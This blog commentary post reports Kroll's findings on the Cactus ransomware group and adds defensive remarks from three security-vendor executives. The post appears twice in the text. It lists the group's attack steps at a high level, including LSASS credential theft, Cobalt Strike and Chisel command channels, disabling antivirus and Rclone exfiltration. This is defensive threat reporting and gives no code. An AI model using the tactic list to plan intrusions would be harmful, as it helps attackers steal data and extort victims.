Kroll researchers detail the discovery of a new, unique ransomware operation known as Cactus that has been targeting high-profile commercial entities by exploiting Fortinet VPN vulnerabilities.
In analysis shared with Bleeping Computer, Kroll researchers described how the attackers used a batch script to obtain the encryptor binary using 7-Zip. Once the original ZIP is removed, the binary is deployed with a specific flag that allows it to execute, thereby preventing detection.
The encryption routine in Cactus ransomware attacks is unique with the following procedures after the initial VPN vulnerability exploitation:
- Establishes C2 with SSH
- Scans the network and generate target list for encryption
- Installation of remote access software for persistent access
- Push files to remote machines with RMM software
- Extract credentials from browsers and LSASS
- Install Cobalt Strike and Chisel for C2
- Disable and uninstall antivirus software
- Add administrator accounts
- Conduct exfiltration via Rclone
- TotalExec.ps1 to push and execute ransomware
Currently, there appears to be no leak site and information has not been made public about the ransoms the Cactus group has demanded.
I have three comments on this. The first is from Steve Hahn, Executive VP, BullWall:
“This is yet another way for Ransomware to completely evade the endpoint security tools such as antivirus and EDR and highlights just how easy it is for the threat actors to kickoff a Ransomware attack despite the most sophisticated detection tools on the planet. Every year Ransomware completely takes down thousands of enterprises. In each such event the impacted companies invested heavily in prevention tools and were given guarantees such as “completely effective against Ransomware”.
Every Ransomware event found a way to disable or evade those tools. Even the Whitehouse admits that Worsening Ransomware attacks are outpacing our ability to stop them. It’s simply a matter of time before any business is hit, loses their infrastructure for weeks and critical data permanently. We can’t continue to rely on prevention, which requires you being 100% effective 100% of the time. We must also implement Ransomware Containment tools to quickly neutralize the attack and air-gapped backup strategies to get systems restarted with the least amount of disruption. Like severe weather, you can prepare for it, but you can’t stop it.”
The next comment is from Dave Ratner, CEO, HYAS:
“Visibility into anomalous outbound connections, indicative of communication to command-and-control, continues to grow in priority as a necessity for modern cyber protection. As attackers find new and innovative ways to infiltrate organizations, the ability to identify the command-and-control communication and stop it before data exfiltration and encryption may be the difference between business resiliency and a significant interruption of business operations.”
The final comment is from Roy Akerman, Co-Founder & CEO, Rezonate:
“Ransomware groups continue to find stealthy techniques to bypass defenses and be able to remotely control systems. SSH backdoors as in the case of Cactus and other remote access techniques such as webshells, provide the same control and are able to disguise as benign, light weight, traffic. SSH traffic, internal recon, use of LSASS and Cobalt Strike, tampering with security controls configuration are many steps security operations teams can better secure today. Smart security teams must take action to prevent suspicious activity on the endpoint, improve data hygiene and recovery capabilities, and limit spread of attack with least privilege access across their identity controls.”
It’s not even 9AM and already I am writing about a pair of new ransomware operations. That’s not good because it illustrates how profitable ransomware is for gangs like these. The fact that this particular ransomware has a novel way to evade detection is concerning as it also illustrates the need for defenders to come up with ways to stay at worst in lockstep with these ransomware gangs.
Like this:
Like Loading...
Related
This entry was posted on May 9, 2023 at 8:55 am and is filed under Commentary. You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
Here’s Another New Ransomware Group… This One Is Called Cactus
Kroll researchers detail the discovery of a new, unique ransomware operation known as Cactus that has been targeting high-profile commercial entities by exploiting Fortinet VPN vulnerabilities.
In analysis shared with Bleeping Computer, Kroll researchers described how the attackers used a batch script to obtain the encryptor binary using 7-Zip. Once the original ZIP is removed, the binary is deployed with a specific flag that allows it to execute, thereby preventing detection.
The encryption routine in Cactus ransomware attacks is unique with the following procedures after the initial VPN vulnerability exploitation:
Currently, there appears to be no leak site and information has not been made public about the ransoms the Cactus group has demanded.
I have three comments on this. The first is from Steve Hahn, Executive VP, BullWall:
“This is yet another way for Ransomware to completely evade the endpoint security tools such as antivirus and EDR and highlights just how easy it is for the threat actors to kickoff a Ransomware attack despite the most sophisticated detection tools on the planet. Every year Ransomware completely takes down thousands of enterprises. In each such event the impacted companies invested heavily in prevention tools and were given guarantees such as “completely effective against Ransomware”.
Every Ransomware event found a way to disable or evade those tools. Even the Whitehouse admits that Worsening Ransomware attacks are outpacing our ability to stop them. It’s simply a matter of time before any business is hit, loses their infrastructure for weeks and critical data permanently. We can’t continue to rely on prevention, which requires you being 100% effective 100% of the time. We must also implement Ransomware Containment tools to quickly neutralize the attack and air-gapped backup strategies to get systems restarted with the least amount of disruption. Like severe weather, you can prepare for it, but you can’t stop it.”
The next comment is from Dave Ratner, CEO, HYAS:
“Visibility into anomalous outbound connections, indicative of communication to command-and-control, continues to grow in priority as a necessity for modern cyber protection. As attackers find new and innovative ways to infiltrate organizations, the ability to identify the command-and-control communication and stop it before data exfiltration and encryption may be the difference between business resiliency and a significant interruption of business operations.”
The final comment is from Roy Akerman, Co-Founder & CEO, Rezonate:
“Ransomware groups continue to find stealthy techniques to bypass defenses and be able to remotely control systems. SSH backdoors as in the case of Cactus and other remote access techniques such as webshells, provide the same control and are able to disguise as benign, light weight, traffic. SSH traffic, internal recon, use of LSASS and Cobalt Strike, tampering with security controls configuration are many steps security operations teams can better secure today. Smart security teams must take action to prevent suspicious activity on the endpoint, improve data hygiene and recovery capabilities, and limit spread of attack with least privilege access across their identity controls.”
It’s not even 9AM and already I am writing about a pair of new ransomware operations. That’s not good because it illustrates how profitable ransomware is for gangs like these. The fact that this particular ransomware has a novel way to evade detection is concerning as it also illustrates the need for defenders to come up with ways to stay at worst in lockstep with these ransomware gangs.
Share this:
Like this:
Related
This entry was posted on May 9, 2023 at 8:55 am and is filed under Commentary. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.